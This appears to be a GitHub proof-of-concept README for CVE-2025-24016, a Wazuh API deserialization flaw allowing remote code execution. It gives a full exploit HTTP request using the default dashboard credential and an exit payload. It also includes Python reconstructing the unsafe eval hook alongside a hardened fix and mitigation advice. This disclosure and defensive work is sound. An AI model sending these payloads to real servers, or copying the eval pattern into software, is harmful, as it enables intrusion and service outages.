MuhammadWaseem29/CVE-2025-24016

Wazuh Remote Code Execution (RCE) - PoC

Vulnerability Overview

This repository demonstrates a remote code execution (RCE) vulnerability in the Wazuh server (CVE-2025-24016), caused by unsafe deserialization in the wazuh-manager package. It allows a remote attacker with API access (a compromised dashboard, another Wazuh server in the cluster or, in certain configurations, a compromised agent) to execute arbitrary code on the server.

Affected Versions

  • wazuh-manager versions >= 4.4.0 and < 4.9.1
  • Patched in version 4.9.1 (and later)

Description

The vulnerability occurs in the Wazuh API: parameters of the DistributedAPI (DAPI) are serialized as JSON and deserialized with as_wazuh_object in framework/wazuh/core/cluster/common.py. An attacker who can inject an unsanitized dictionary into a DAPI request can forge an unhandled-exception object (the __unhandled_exc__ key), whose __class__ string is evaluated as Python code.

This PoC reaches that code path through the run_as endpoint, whose JSON body is passed on as the auth_context argument and is therefore fully attacker-controlled. A crafted body results in arbitrary code execution on the master server.

Proof of Concept

To trigger this vulnerability using the server API, follow the steps below.

PoC Burp Suite Request

  1. Burp Suite Request to Trigger the Vulnerability:
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}


  2. Explanation of the request:
  • Authorization header: HTTP Basic credentials, the base64 encoding of wazuh-wui:MyS3cr37P450r.*- (the dashboard API user with its default password).
  • Payload: the body is a forged __unhandled_exc__ object. The deserializer evaluates its __class__ string as Python and calls the result with __args__, so "exit" with an empty argument list calls Python's exit function on the server; any other Python expression works the same way.
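The following is an added example, not code from this repository or from Wazuh: it models the Description and the request explanation above in plain Python. build_poc_request assembles the header and body of the request shown (the credential is the one named in the explanation); vulnerable_hook is a minimal reconstruction of the pattern attributed to as_wazuh_object (an attacker-controlled __class__ string evaluated and called), and hardened_hook is one possible fix using an allowlist, which is an assumption here and not the patch shipped in 4.9.1. The probe payload with __import__('os').getpid is constructed for the demo so that arbitrary evaluation can be observed without terminating the process the way eval("exit")() would.

```python
"""Added illustration of the CVE-2025-24016 deserialization flaw.

Neither hook below is Wazuh's code: vulnerable_hook reconstructs the
pattern the description attributes to as_wazuh_object, hardened_hook is
an assumed fix (not the one in 4.9.1).
"""
import base64
import builtins
import json
import os

RUN_AS_PATH = "/security/user/authenticate/run_as"


def build_poc_request(user: str, password: str,
                      class_name: str = "exit", args=None) -> dict:
    """Assemble the PoC request: Basic auth header plus JSON body."""
    cred = base64.b64encode(f"{user}:{password}".encode()).decode()
    body = {"__unhandled_exc__": {"__class__": class_name,
                                  "__args__": list(args or [])}}
    return {"path": RUN_AS_PATH,
            "Authorization": f"Basic {cred}",
            "body": json.dumps(body)}


def vulnerable_hook(dct: dict):
    """Unsafe pattern (reconstruction): eval '__class__', call it with '__args__'.

    With the page's payload this is eval("exit")(), which raises SystemExit
    in the process handling the request."""
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        return eval(exc["__class__"])(*exc["__args__"])  # deliberately unsafe
    return dct


# Allowlist of real built-in exception classes. Functions such as exit and
# non-Exception types such as SystemExit are excluded by construction.
ALLOWED_EXCEPTIONS = {
    name: obj for name, obj in vars(builtins).items()
    if isinstance(obj, type) and issubclass(obj, Exception)
}


def hardened_hook(dct: dict):
    """Assumed fix: look the class name up in an allowlist, never evaluate it."""
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        cls = ALLOWED_EXCEPTIONS.get(exc.get("__class__"))
        if cls is None:
            raise ValueError(f"refusing to rebuild unknown exception {exc.get('__class__')!r}")
        args = exc.get("__args__", [])
        if not all(isinstance(a, (str, int, float, bool, type(None))) for a in args):
            raise ValueError("exception args must be plain scalars")
        return cls(*args)
    return dct


def deserialize(raw: str, hook):
    """json.loads runs the hook on every decoded dict, innermost first."""
    return json.loads(raw, object_hook=hook)


def is_rejected(raw: str) -> bool:
    """True if the hardened hook refuses the document."""
    try:
        deserialize(raw, hardened_hook)
    except ValueError:
        return True
    return False


def demo() -> dict:
    """Run constructed payloads through both hooks and collect the outcomes."""
    results = {}
    # The page's PoC with the credential named in the explanation.
    poc = build_poc_request("wazuh-wui", "MyS3cr37P450r.*-")
    results["auth_header"] = poc["Authorization"]
    # Constructed probe: a harmless expression that still proves arbitrary
    # evaluation (the server would return its own PID instead of exiting).
    probe = build_poc_request("wazuh-wui", "MyS3cr37P450r.*-",
                              class_name="__import__('os').getpid")
    results["vulnerable_returns_own_pid"] = (
        deserialize(probe["body"], vulnerable_hook) == os.getpid())
    results["hardened_rejects_probe"] = is_rejected(probe["body"])
    results["hardened_rejects_exit"] = is_rejected(poc["body"])
    # A genuine exception still round-trips through the hardened hook.
    legit = json.dumps({"__unhandled_exc__": {"__class__": "ValueError",
                                              "__args__": ["bad input"]}})
    results["hardened_keeps_real_exception"] = isinstance(
        deserialize(legit, hardened_hook), ValueError)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the block prints the Authorization header expected for the default credential, shows the vulnerable hook returning the interpreter's PID for the probe, and shows the hardened hook refusing both the probe and the "exit" payload while still rebuilding a normal ValueError. The point of the allowlist is that the class name is only ever used as a dictionary key, so no string from the request reaches eval, import or getattr.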

Impact

  • Remote Code Execution (RCE): an attacker with API credentials can execute arbitrary Python code on the Wazuh server; affected versions are 4.4.0 through 4.9.0 (fixed in 4.9.1).
  • Denial of Service: this PoC calls exit, which raises SystemExit and terminates the API process that evaluated the payload, so the PoC is visible as an API outage even before any other code is run.

Mitigation

To protect your systems, upgrade to Wazuh 4.9.1 or later, where this issue is patched. Until the upgrade is done, restrict network access to the API port (55000) to the dashboard and cluster nodes and replace the default API credentials: the PoC only needs a valid API user, and run_as additionally requires that user to have allow_run_as enabled, which the default wazuh-wui user does because the dashboard relies on it.